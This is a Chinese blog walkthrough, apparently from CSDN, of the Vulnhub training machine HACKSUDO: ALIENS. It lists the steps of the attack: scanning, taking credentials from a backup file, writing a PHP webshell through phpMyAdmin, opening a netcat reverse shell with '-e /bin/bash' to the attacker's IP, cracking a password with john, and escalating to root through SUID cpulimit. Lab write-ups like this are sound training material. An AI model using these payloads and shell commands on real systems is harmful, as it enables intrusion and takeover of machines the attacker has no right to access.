看完这篇教你玩转靶机HACKSUDO: ALIENS

最新推荐文章于 2023-12-01 14:24:42 发布
最新推荐文章于 2023-12-01 14:24:42 发布
阅读量557 收藏 3
点赞数 5
分类专栏: 网络安全 文章标签: 安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54556978/article/details/124005998
版权

Vulnhub介绍:
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。

靶机下载:
 https://download.vulnhub.com/hacksudo/HacksudoAliens.zip

1.nmap -sS -A -p- -n +靶机ip

2.发现有9000端口访问它发现是phpmyadmin页面

3.dirb http://+靶机ip

发现有backup访问它

下载mysq.bak

4.查看它

cat mysql.bak

发现数据库的用户名和密码

user vishal

password hacksudo

我们来尝试登录phpmyadmin发现可以登录

5.我们点击SQL执行sql语句,看是否设置了secure_file_priv

show global variables like ‘%sercure%’;

我们发现secure_file_priv的值是空的,这样我们就可以利用一句话木马了

6.select “<?php system($_GET[‘cmd’]);?>” into outfile “/var/www/html/webshell555.php”

上传一句话木马后在网页访问

可以查看一下我们要登录的用户,网址后面加上?cmd=id

7.开启监听

nc -nlvp 4444

利用网站后台脚本使用浏览器访问

靶机ip/webshell555.php?cmd=nc%20+本机ip%5555%20-e%20/bin/bash

靶机ip/webshell555.php?cmd=nc +本机ip 5555 -e  /bin/bash

8.

返回终端查找

find / -perm -4000 2>/dev/nulll

发现有date可以利用它提权

发现用户hacksudo的密码,但它是加密的

把密码拷下来写入一个文件

然后我们可以用john解密

密码为   aliens

9.切换到用户hacksudo

继续查看是否有权限的文件

find / -perm -4000 2>/dev/null

使用cpulimit来进行suid提权的方法

先进入/home/hacksudo/Downloads

./cpulimit -l 100 -f -- /bin/sh -p

whoami

cd /root

ls

cat root.txt

 

hangoverqing
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
Hacksudo—fog
Demonering的博客
02-23 4051
1.信息收集 存活主机扫描 端口扫描 目录扫描 nmap -A -T4 -p- 192.168.56.0/24 发现192.168.56.101开放21,22,80,443,3306端口 访问对应80端口 暂时没发现可用东西,接着目录扫描 didirb http://192.168.56.101/ gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-mediu
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装最好重启一下。成上述步骤后可以netdiscover一下确定。 利用...
HacksudoAliens
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-04 403
HacksudoAliens arp-scan --interface=eth0 192.168.1.0/24 nmap -sC -sV -p- -sT 192.168.1.251 -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans sV: Probe open ports to determine service/version info -sC: equivalent to --script=default ..
Vulnhub靶机测试 No.31 hacksudoAliens
YouthBelief的博客
04-12 571
hacksudoAlienshacksudoAliens1 靶机介绍2 测试过程2.1 nmap探测ip2.2 nmap扫描端口2.3 测试思路2.4 80端口探测2.5 gobuster目录枚举2.6 翻目录2.7 查看mysql.bak2.8 9000端口phpmyadmin登录2.9 蚁剑连接2.10 反弹shell2.11 切换整终端3 提权3.1 信息收集3.1.1 用户信息收集3.1.2 suid信息收集3.2 suid权限的date读取shadow3.3 john 破解ssh密码3.4 su
vulnhubHACKSUDO: ALIEN
qwweggfe的博客
08-12 306
信息收集 首先进行ip扫描 查看开启哪些端口 打开网页进行查看 对其网页目录进行扫描 gobuster dir -u http://192.168.181.149/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 打开/image的目录,发现一张图片,我怀疑可能是隐写,于是进行爆破 stegbrute -f /root/sprites.png -w /usr/share/wordlists..
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
hack_fish_sudo:这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
03-26
hack_fish_sudo 这是我尝试过的一种方法,可以让您借助别名在鱼控制台中获取sudo密码。 该脚本是用python制作的。 PS我不是一个确切的PHD所有者,所以不要盯着我的代码太久,因为我知道这很糟糕
靶机渗透练习94-hacksudo:2 (HackDudo)
hirak0的博客
05-07 765
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/ Description N/A This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.13 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下
靶机渗透练习93-hacksudo:1.0.1
hirak0的博客
05-06 2173
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-101,650/ Description N/A This works better with VirtualBox rather than VMware ## Changelog 2021-04-04 - v1.0.1 2021-02-22 - v1.0.0 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.12 注:靶机与Kali的IP地
Vulnhub靶场Hacksudo:Aliens
最新发布
2301_76232299的博客
12-01 5223
信息收集是很重要,思路一步一步的走,就会很轻松了,这个靶机还是蛮有趣了,也不难😁😁😁,有兴趣的可以去玩玩!
hacksudo靶机打靶过程及思路
qq_52610024的博客
05-03 968
3.注释里面有一个cgi-bin可以使用外部应用程序,此时通擦汗那个会存在一个cgi-bin的文件夹。sudocat/etc/shadow发现可以查看密码文件,但是需要考虑到可能破解需要很多的时间。执行脚本sudo-uthor/home/thor/./hammer.sh。发现第二个问题时可以执行输入的系统指令输入bash得到thor的shell。4.查看所有的后缀名为cgi,sh的文件,使用破壳漏洞尝试控制系统。sudo-l发现thor目录下有一个可以执行的shell脚本。...
这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
Aluxian_的博客
10-26 730
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
hacksudo FOG
bobo_milk的博客
05-26 532
vulnhub靶场hacksudo FOG
hacksudo: L.P.E.
wanguixiu的博客
06-10 364
hacksudo: L.P.E. 作者: admin 时间: 2021-06-03 分类: vulnhub靶场 step1.存活主机探测,使用"fping -g 192.168.3.0/24"扫描,结果如下,1是网关,129是kali,目标主机是133step2.端口扫描,使用"nmap -A -p 1-65535 -v 192.168.3....
vulnhubhacksudo:Thor
weixin_54431413的博客
05-24 547
前期:主机发现端口扫描,服务版本探测, 中期:信息收集,通过源码发现管理员默认密码,发现逻辑漏洞,sql注入等 后期:通过cgi程序利用破壳漏洞成功突破边界,最后利用一些命令配置不当实现成功提权。 此篇最重要的一点就是破壳漏洞和系统逻辑漏洞, 要迟到了,上课去了
vulnhub靶机系列:
09-09
通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值